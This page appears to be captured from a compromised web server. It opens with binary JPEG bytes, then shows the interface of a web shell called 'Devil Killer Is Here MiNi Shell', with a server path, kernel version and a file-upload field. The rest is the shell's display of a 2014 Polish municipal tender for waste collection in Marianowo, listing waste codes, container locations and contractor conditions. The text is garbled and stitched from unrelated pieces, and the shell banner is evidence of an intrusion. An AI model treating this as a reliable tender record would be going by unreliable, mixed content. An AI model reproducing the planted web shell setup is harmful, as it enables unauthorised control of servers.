JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141113/236463-N-2014.html

<p class="kh_header"><b>Marianowo: Odbiór i zagospodarowanie odpadów komunalnych z nieruchomości zamieszkałych na terenie gminy Marianowo</b><br>
<b>Numer ogłoszenia: 236463 - 2014; data zamieszczenia: 13.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Marianowo , Mieszka I 1, 73-121 Marianowo, woj. zachodniopomorskie, tel. 091 561 38 66, faks 091 561 38 66.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z nieruchomości zamieszkałych na terenie gminy Marianowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Odpady niesegregowane (zmieszane) odpady komunalne 
- kod: 20 03 01.    
Niesegregowane (zmieszane) odpady komunalne odbierane będą z pojemników ustawionych w przeznaczonych do tego miejscach na terenie nieruchomości zamieszkałych o pojemności 120 l. Pojemniki zapewnia właściciel nieruchomości. Wykonawca na koszt właściciela nieruchomości dostarczy i ustawi pojemniki o odpowiedniej pojemności w miejscach wskazanych przez właściciela nieruchomości. Szacowana ilość pojemników:  ok. 1150 sztuk.

Częstotliwość wywozu przez Wykonawcę odpadów zmieszanych:

Co 2 tygodnie (2 razy w miesiącu) 

2) Selektywnie zbierane odpady komunalne (odpady segregowane), w tym odpady opakowaniowe 
- kody: 15 01 01, 15 01 02, 15 01 04, 15 01 05, 15 01 06, 15 01 07, 20 01 01, 20 01 02, 20 01 39, 20 01 40.    

Selektywna zbiórka odpadów komunalnych na terenie całej gminy Marianowo odbywać się będzie w pojemnikach typu igloo w trzech różnych kolorach, odpowiednio: 
a) pojemnik żółty - odpady z tworzyw sztucznych, metalu,
b) pojemnik zielony - szkło i odpady opakowaniowe ze szkła,
c) pojemnik niebieski - odpady z papieru i tektury, opakowania wielomateriałowe.

Pojemniki zapewnia Zamawiający. Pojemniki rozmieszczone będą w ogólnodostępnych punktach zlokalizowanych na terenie gminy Marianowo wg Tabela 1.

Częstotliwość wywozu - opróżnianie pojemników przez Wykonawcę następować będzie zgodnie z harmonogramem wywozu sporządzonym przez Wykonawcę i zaakceptowanym przez Zamawiajacego. 

3) Odpady biodegradowalne: 
- kody: 20 01 08, 20 02 01.

Odpady biodegradowalne odbierane będą z Gminnego Punktu Zbiórki Odpadów (GPZO) zlokalizowanego przy gminnym składowisku odpadów innych niż niebezpieczne i obojętne, działka nr 344-5 obręb Marianowo, z kontenera o pojemności do 5000 l opatrzonego napisem określającym rodzaj zbieranych do niego odpadów. 
Kontener na odpady biodegradowlane zapewnia Wykonawca.

Częstotliwość wywozu - odbiór odpadów biodegradowalnych z GPZO - następować będzie jeden raz w okresie objętym niniejszym zamówieniem od poniedziałku do piątku z możliwością udostępnienia kontenera w sobotę. Data odbioru zostanie ustalona z Wykonawcą.

4) Odpady wielkogabarytowe:
 - kod: 20 03 07. 
Odpady wielkogabarytowe odbierane będą z GPZO zlokalizowanego na gminnym składowisku odpadów innych niż niebezpieczne i obojętne, działka 344-5 obręb Marianowo, z kontenera o pojemności do 5000 l opatrzonego napisem określającym rodzaj zbieranych do niego odpadów. 
Kontener na odpady wielkogabarytowe zapewnia Wykonawca.
Częstotliwość wywozu - odbiór odpadów wielkogabarytowych z GPZO następować będzie jeden raz w okresie objętym niniejszym zamówieniem od poniedziałku do piątku z możliwością udostępnienia kontenera w sobotę. Data odbioru zostanie ustalona z Wykonawcą.

5) Zużyte baterie i akumulatory:
 - kody:20 01 33, 20 01 34.
 zużyty sprzęt elektryczny i elektroniczny:
- kody:20 01 23, 20 01 35,20 01 36.

Zużyte baterie i akumulatory, zużyty sprzęt elektryczny i elektroniczny odbierane będą z Gminnego Punktu Zbiórki Odpadów zlokalizowanego na gminnym składowisku odpadów innych niż niebezpieczne i obojętne, działka 344/5 obręb Marianowo, z kontenera o pojemności do 5000 l opatrzonego napisem określającym rodzaj zbieranych do niego odpadów. 
Kontener na zużyte baterie i akumulatory, zużyty sprzęt elektryczny i elektroniczny zapewnia Wykonawca.

Częstotliwość wywozu - odbiór zużytych baterii i akumulatorów, zużytego sprzętu elektrycznego i elektronicznego z GPZO następować będzie jeden raz w okresie objętym niniejszym zamówieniem od poniedziałku do piątku z możliwością udostępnienia kontenera w sobotę. Data odbioru zostanie ustalona z Wykonawcą.

6) Odpady budowlane i rozbiórkowe:
 - kody: 17 01 01, 17 01 02, 17 01 03, 17 01 07, 17 01 80, 17 01 81, 17 01 82, 17 09 04, 20 03 99. 

Odpady budowlane i rozbiórkowe odbierane będą z Gminnego Punktu Zbiórki Odpadów zlokalizowanego na gminnym składowisku odpadów innych niż niebezpieczne i obojętne, działka 344-5 obręb Marianowo, z kontenera o pojemności do 5000 l opatrzonego napisem określającym rodzaj zbieranych do niego odpadów. 
Kontener na odpady budowlane i rozbiórkowe zapewnia Wykonawca.

Częstotliwość wywozu - odbiór odpadów budowlanych i rozbiórkowych z GPZO następować będzie jeden raz w okresie objętym niniejszym zamówieniem od poniedziałku do piątku 
z możliwością udostępnienia kontenera w sobotę. Data odbioru zostanie ustalona z Wykonawcą.

7) Przeterminowane chemikalia i opakowania po nich, opakowania po środkach ochrony roślin i nawozach: 
- kody: 20 01 14, 20 01 15, 20 01 19, 20 01 29, 20 01 30, 20 01 80, 15 01 10, 15 01 11. 
przeterminowane leki: 
- kody: 20 01 31, 20 01 32.
Przeterminowane chemikalia i opakowania po nich, opakowania po środkach ochrony roślin i nawozach, przeterminowane leki odbierane będą z Gminnego Punktu Zbiórki Odpadów zlokalizowanego na gminnym składowisku odpadów innych niż niebezpieczne i obojętne, działka 344-5 obręb Marianowo, z kontenera o pojemności do 5000 l opatrzonego napisem określającym rodzaj zbieranych do niego odpadów. 
Kontener na przeterminowane chemikalia i opakowania po nich, opakowania po środkach ochrony roślin i nawozach, przeterminowane leki zapewnia Wykonawca.

Częstotliwość wywozu - odbiór przeterminowanych chemikaliów i opakowań po nich, opakowań po środkach ochrony roślin i nawozach, przeterminowanych leków z GPZO następować będzie jeden raz w okresie objętym niniejszym zamówieniem od poniedziałku do piątku z możliwością udostępnienia kontenera w sobotę. Data odbioru zostanie ustalona z Wykonawcą.

8) Zużyte opony:
- kod: 16 01 03.
Zużyte opony odbierane będą z Gminnego Punktu Zbiórki Odpadów zlokalizowanego na gminnym składowisku odpadów innych niż niebezpieczne i obojętne, działka nr 344-5 obręb Marianowo, z kontenera o pojemności do 5000 l opatrzonego napisem określającym rodzaj zbieranych do niego odpadów. 
Kontener na zużyte opony zapewnia Wykonawca.

Częstotliwość wywozu - przez Wykonawcę zużytych opon z GPZO następować będzie jeden raz 
w okresie objętym niniejszym zamówieniem od poniedziałku do piątku z możliwością udostępnienia kontenera w sobotę. Data odbioru zostanie ustalona z Wykonawcą.

5.  Szczegółowe dane charakteryzujące zamówienie.

1) Szacunkowa ilość pojemników do odbioru i wywozu niesegregowanych (zmieszanych) odpadów komunalnych z terenu całej gminy o pojemności od 120 l do 1100 l - 1100 szt. (z zastrzeżeniem, że ilości te mogą się zmienić w granicach 10%).
Zgodnie z zapisami Regulaminu utrzymania czystości i porządku na terenie gminy Marianowo, do gromadzenia niesegregowanych odpadów komunalnych dopuszcza się pojemniki 
o pojemności 120 l, 240 l i 1100 l. Wykonawca na koszt właściciela nieruchomości dostarczy 
i ustawi pojemniki  w miejscach wskazanych przez właściciela nieruchomości.

2) Charakterystyka wraz z szacunkową ilością i rozmieszczeniem pojemników do selektywnej zbiórki odpadów komunalnych: 
Pojemniki o pojemności 2500 l, przystosowane do opróżniania za pomocą dźwigu tzw. HDS, 
z zaczepem do podnoszenia oraz otwierania dna pojemnika w ilości 15 sztuk. Pojemniki zapewnia Zamawiający z zastrzeżeniem, że ich ilość może się zmienić o 20 %. Zamawiający zastrzega możliwość zmiany lokalizacji pojemników. O każdej takiej zmianie Zamawiający powiadomi niezwłocznie Wykonawcę.

Tabela 1. Rozmieszczenie i ilość pojemników do selektywnej zbiórki.
Lp.	Miejscowość	Pojemnik	Nr ew. działki
		Żółty	Zielony	Niebieski	
1	Sulino boisko przy świetlicy wiejskiej	1	1	1	718-12
2	Sulino przy sklepie 	1	1	1	726-18
3	Wiechowo przy przepompowni ścieków	1	1	1	40
4	Marianowo ul. Mieszka I	1	1	1	97-4
5	Marianowo ul. Stargardzka	1	1	1	27
6	Marianowo ul. Słoneczna	1	1	1	215-14
7	Trąbki przy drodze do stacji PKP	1	1	1	12-13
8	Dzwonowo przy cmentarzu	1	1	1	311
9	Dzwonowo przy świetlicy wiejskiej	1	1	1	193-3
10	Czarnkowo przy przystanku	1	1	1	160-4
11	Dalewo przy brukowanej drodze	1	1	1	282
12	Gogolewo przy zakładzie kamieniarskim	1	1	1	328
13	Gogolewo przy budynku wielorodzinnym nr 15	1	1	1	248
14	Krzywiec przy drodze do hydrofornii	1	1	1	1-3
15	Kępy centrum miejscowości	1	1	1	15
 	 	 	                        Razem	15	15	15	


3) Zamawiający zastrzega, że miejsce lokalizacji pojemników do selektywnej zbiórki odpadów może ulec zmianie przed bądź w trakcie realizacji zamówienia. O każdej tego typu zmianie Wykonawca zostanie poinformowany na piśmie bądź zmiana zostanie wprowadzona do niniejszej SIWZ.

4) Charakterystyka pojemników w GPZO.
­1 pojemnik na odpady biodegradowalne - kontener zamknięty o pojemności do 5000 l, przystosowany do transportu odpowiednimi pojazdami, opatrzony napisem określającym rodzaj zbieranych do niego odpadów,
­1 pojemnik na odpady wielkogabarytowe - kontener o pojemności do 5000 l, przystosowany do transportu odpowiednimi pojazdami, opatrzony napisem określającym rodzaj zbieranych do niego odpadów,
­1 pojemnik na zużyte baterie i akumulatory, zużyty sprzęt elektryczny i elektroniczny - kontener zamknięty o pojemności do 5000 l, przystosowany do transportu odpowiednimi pojazdami, opatrzony napisem określającym rodzaj zbieranych do niego odpadów,
­1 pojemnik na odpady budowlane i rozbiórkowe - kontener o pojemności do 5000 l przystosowany do transportu odpowiednimi pojazdami, opatrzony napisem określającym rodzaj zbieranych do niego odpadów,
­1 pojemnik na przeterminowane chemikalia i opakowania po nich, opakowania po środkach ochrony roślin i nawozach, przeterminowane leki - kontener zamknięty o pojemności do 5000 l, przystosowany do transportu odpowiednimi pojazdami, opatrzony napisem określającym rodzaj zbieranych do niego odpadów,
­1 pojemnik na zużyte opony - kontener o pojemności do 5000 l, przystosowany     do transportu odpowiednimi pojazdami opatrzony napisem określającym rodzaj zbieranych do niego odpadów.


5) Ilości odpadów komunalnych odebrana z terenu gminy Marianowo od stycznia 2014 do czerwca  2014. 

    Tabela 2
Rodzaj odpadów	Ilości odpadów w Mg
	I 2014 - VI 2014
Zmieszane odpady komunalne	301,54
Papier	9,59
Szkło	27,50
Tworzywa sztuczne	8,73
Odpady wielkogabarytowe	8,20


6. Obowiązki Wykonawcy przed rozpoczęciem oraz w trakcie realizacji zamówienia.

1) Najpóźniej dwa dni przed dniem podpisania umowy na realizację zamówienia Zamawiający dostarczy Wykonawcy szczegółowy wykaz punktów odbioru odpadów komunalnych 
z nieruchomości objętych umową odbioru odpadów. 
2) Wykonawca na koszt i zgodnie ze zleceniem właściciela nieruchomości wyposaży nieruchomość w niezbędne pojemniki przed pierwszym dniem obowiązywania umowy na odbiór odpadów zawartej z Zamawiającym. 
3) Zamawiający dostarczy pojemniki do selektywnej zbiórki w oparciu o wykaz zawarty w tabeli nr 1 - Rozmieszczenie i ilość pojemników do selektywnej zbiórki, przed pierwszym dniem obowiązywania umowy na odbiór odpadów zawartej z Zamawiającym. 
4) Wykonawca jest zobowiązany do wykonania Harmonogramu odbioru odpadów komunalnych na terenie gminy Marianowo. Przy sporządzaniu harmonogramu Wykonawca musi uwzględnić listę punktów wywozowych, o której mowa w pkt 1, częstotliwość odbioru odpadów w poszczególnych miejscowościach, o której mowa w ust 4 pkt 1, oraz częstotliwość odbioru odpadów z GPZO. Harmonogram opracowany przez Wykonawcę wymaga akceptacji przez Zamawiającego najpóźniej w dniu podpisania umowy.
5) Zamawiający i Wykonawca wspólnie odpowiadają za informowanie mieszkańców o zasadach i terminach odbierania poszczególnych rodzajów odpadów. Opracowany przez Wykonawcę i zaakceptowany przez Zamawiającego harmonogram, Zamawiający będzie publikował na stronie internetowej www.marianowo.pl, a Wykonawca w formie wydruków, będzie zobowiązany przekazać właścicielom nieruchomości podczas pierwszego odbioru odpadów. 
6) Wykonawca zobowiązany jest do przedkładania Zamawiającemu kwartalnych sprawozdań, zgodnych z art. 9n ust.1-3 z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U. z 2013 r. poz. 1399 ze zm.).
7) Wykonawca odpowiada za stan techniczny i sanitarny pojemników i kontenerów do gromadzenia selektywnie zbieranych odpadów, o których mowa w ust 4 pkt. 2 - 8. Wykonawca zobowiązany jest do ich napraw, systematycznych konserwacji, mycia i dezynfekcji oraz wymiany uszkodzonych lub zniszczonych pojemników.
8) Wykonawca jest zobowiązany do zebrania także odpadów leżących obok pojemników i kontenerów do gromadzenia selektywnie zbieranych odpadów, o których mowa w ust 4 pkt 2 - 8.
9) Wykonawca podczas odbioru zmieszanych odpadów komunalnych z nieruchomości zamieszkałych z terenu gminy Marianowo, będzie sprawdzał zawartość pojemników na w/w odpady. W przypadku stwierdzenia znacznych ilości (powyżej 10%) odpadów frakcji zbieranych selektywnie, będzie na bieżąco informował Zamawiającego. Raporty z w/w czynności Wykonawca dostarcza w ciągu 10 dni roboczych po przeprowadzonej kontroli i podaje w nim informacje jakie nieruchomości sprawdzono i na jakich nieruchomościach stwierdzono obecność odpadów zbieranych selektywnie w pojemnikach na zmieszane odpady komunalne, podając adres nieruchomości, datę przeprowadzonej kontroli oraz dokumentacje fotograficzną lub video. 
10) Pojazdy Wykonawcy w trakcie realizacji usług odbioru odpadów komunalnych realizowanych na rzecz Zamawiającego nie mogą jednocześnie odbierać odpadów komunalnych z nieruchomości niezamieszkałych, które nie są objęte gminnym systemem gospodarowania odpadami, z zastrzeżeniem zapisów zawartych w pkt 11, 
11) Jednoczesny odbiór odpadów komunalnych z nieruchomości niezamieszkałych, które nie są objęte gminnym systemem gospodarowania odpadami, jest dopuszczony tylko i wyłącznie w przypadku, gdy odbiór z pojemnika stanowiącego wyposażenie nieruchomości niezamieszkałej jest jednoznacznie ewidencjonowany elektronicznie z wyszczególnieniem danych o pojemności pojemnika i rodzaju odpadów w nim gromadzonych, które to dane mogą w sposób precyzyjny określić procentowy udział odpadów odbieranych z nieruchomości objętych i nieobjętych gminnym systemem gospodarowania odpadami. Określony w ten sposób udział stanowi podstawę określenia ostatecznej masy odpadów odebranych i zagospodarowanych w ramach realizacji usługi na rzecz Zamawiającego.
12) Odpady komunalne stanowiące przedmiot zamówienia zebrane z terenu gminy Marianowo, Wykonawca zobowiązany jest zagospodarować (poddać odzyskowi lub unieszkodliwieniu) zgodnie z obowiązującym prawem, w tym zmieszane odpady komunalne, odpady ulegające biodegradacji oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania przekazywać do regionalnych instalacji do przetwarzania odpadów komunalnych oraz przedstawienie Zamawiającemu (jeden raz w miesiącu, razem z fakturą) dowodów potwierdzających wykonanie tych czynności, tj. karty przekazania odpadów.
13) Za szkody w majątku Zamawiającego lub osób trzecich spowodowane w trakcie odbioru odpadów odpowiedzialność ponosi Wykonawca.
14) Wykonawca zobowiązany jest do przestrzegania obowiązujących w trakcie trwania umowy przepisów prawnych, a w szczególności:
a) ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21 z późn. zm.),
b) ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2013 r., poz. 1399, z późn. zm.),
c) uchwały nr XXII-161-2012 Rady Gminy Marianowo z dnia 20 grudnia 2012 r. w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Marianowo (Dz. Urz. Woj. Zachodniopomorskiego z 2013 r. poz. 792.),
d) uchwały nr XXII-166-2012 Rady Gminy Marianowo z dnia 20 grudnia 2012 r. w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zamieszkałych i zagospodarowania tych odpadów, w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi (Dz. Urz. Woj. Zachodniopomorskiego z 2013 r. poz. 467),
e) uchwały nr XVI-218-12 Sejmiku Województwa Zachodniopomorskiego z dnia 29 czerwca 2012 r. w sprawie Planu Gospodarki Odpadami Województwa Zachodniopomorskiego dla regionu szczecińskiego.

15) System odbierania odpadów komunalnych nie obejmuje odpadów powstających w wyniku prowadzenia działalności gospodarczej.
16) Wykonawca zobowiązany jest do odbioru i zagospodarowania całej ilości odpadów komunalnych przekazanych z nieruchomości zamieszkałych przez osoby zamieszkałe w Gminie Marianowo. 

7. Dla potrzeb złożenia oferty Zamawiający szacuje łączną masę odpadów komunalnych do odbioru i zagospodarowania z terenu nieruchomości zamieszkałych na poziomie:

Tabela 3
Rodzaj odpadów	Szacowana ilość odpadów w ciągu 
6 miesięcy trwania umowy [Mg]
Zmieszane odpady komunalne	300,00
Odpady komunalne gromadzone w sposób selektywny	60,00

Ustalone ilości są szacunkowe i mogą ulec zmianie w trakcie realizacji zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie Wykonawcy usług zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień zgodnie z art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych. Możliwość udzielenia zamówienia uzupełniającego jest jedynie prawem Zamawiającego - nie stanowi żadnego wiążącego zobowiązania.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7, 90.51.00.00-5, 90.51.40.00-3, 90.51.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium należy wnieść w wysokości 5.000 zł (słownie pięć tysięcy złotych) w terminie do dnia       21 listopada 2014 r. do godziny 10:30 - decyduje moment (godzina, minuta) wpływu środków na rachunek  Zamawiającego. Dowód wniesienia wadium należy dołączyć do składanej oferty</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że posiada:
a) zezwolenie  na zbieranie i transport odpadów (zgodnie z art. 41 ustawy  z dnia 14 grudnia 2012 roku o odpadach , Dz.U. z 2013 roku, poz.21 ze zm.),
b) zaświadczenia o wpisie  do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości wydane przez Wójta Gminy Marianowo.
c) wpis do rejestru  Głównego  Inspektora Ochrony  Środowiska  lub Marszałka Województwa dot. zbierania  zużytego sprzętu elektrycznego i elektronicznego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 1 usługę główną. Za usługę główną zamawiający uzna usługę odbioru i zagospodarowania (lub przekazania do zagospodarowania odpadów komunalnych, z których każda była wykonywana na rzecz właścicieli nieruchomości lub gmin, w sposób ciągły przez okres co najmniej 12 miesięcy, która to usługa lub usługi obejmowały odbiór i zagospodarowanie odpadów komunalnych zmieszanych o łącznej masie minimum 500 Mg.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku:  warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował:
­	co najmniej dwoma pojazdami specjalistycznymi przystosowanymi do odbioru zmieszanych odpadów komunalnych,
­	co najmniej dwoma pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych,
­	co najmniej jednym pojazdem przystosowanym do odbierania odpadów bez funkcji kompaktującej,
­	jednej bazy magazynowo - transportowej spełniającej wymogi Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań 
w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. 
z 2013 r. poz. 122) oraz Rozporządzenia Ministra Środowiska z dnia 16 czerwca 2009r. w sprawie bezpieczeństwa i higieny pracy przy gospodarowaniu odpadami komunalnymi (Dz. U. z 2009 r. Nr 104 poz. 868).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca złoży oświadczenie wg załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony  od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie niższą niż 250.000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
